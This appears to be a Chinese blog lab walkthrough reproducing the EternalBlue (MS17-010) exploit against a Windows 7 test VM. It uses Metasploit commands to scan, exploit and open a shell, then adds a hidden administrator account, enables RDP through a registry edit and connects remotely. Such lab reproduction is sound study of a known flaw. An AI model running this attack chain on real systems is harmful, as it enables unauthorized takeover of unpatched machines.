利用永恒之蓝(MS17010)漏洞攻击靶机

MS17010漏洞复现和利用

相关环境

攻击机:Kali-linux 5.9.0
靶机:Windows 7 SP1旗舰版

获取靶机IP地址

打开cmd查看ip地址

ipconfig

image-20210203202706412.png

关闭防火墙,检查通讯状态

需要关闭靶机的防火墙

打开网络和共享中心

image-20210203202834222.png

进入windows防火墙设置

image-20210203202906298.png
image-20210203202932655.png
image-20210203203001386.png

成功关闭防火墙

image-20210203203502759.png

检查通讯状况

在kali linux里

ping 192.168.137.130

image-20210203203604876.png
在windows 7里

ping 192.168.137.128

image-20210203203622717.png

两边都ping得通,说明通讯正常

攻击步骤

检查是否存在漏洞

运行postgresql数据库

service postgresql start 

打开msf

msfconsole

image-20210203203739927.png

使用相关模块

use  auxiliary/scanner/smb/smb_ms17_010

查看相关配置信息

show options

设置目标IP为靶机的IP

set rhost 192.168.137.130

开始对靶机进行扫描

run 

image-20210203205501575.png

发现漏洞并攻击

搜索msf17010漏洞模块

search ms17-010

使用该漏洞模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue 

查看其配置详情

show options

image-20210203210021392.png

设置靶机IP

set rhost 192.168.137.130

使用exploit或者run命令进行攻击

exploit

image-20210203210234736.png

获取shell

shell

image-20210203210346744.png

利用漏洞提权

创建管理员账户

net user pigpig 123456 /add

我们在win7那边已经可以看到了

image-20210203210657648.png

增加管理员权限

net localgroup administrators pigpig /add

image-20210203210709099.png

在去win7那边观察

image-20210203210749459.png

开启3389端口并远程访问控制

将win7靶机那边远程服务打开

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20210203210855974.png

打开3389端口之后,在新的shell里

rdesktop 192.168.137.130:3389

image-20210203212734846.png

点击yes之后,就可以在kali里面进入到win7靶机了。

image-20210203212755623.png

image-20210203212858622.png

输入账户密码回车,点了同意靶机的管理员账户就会掉线

image-20210203212916039.png

成功进入了

image-20210203213041501.png

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论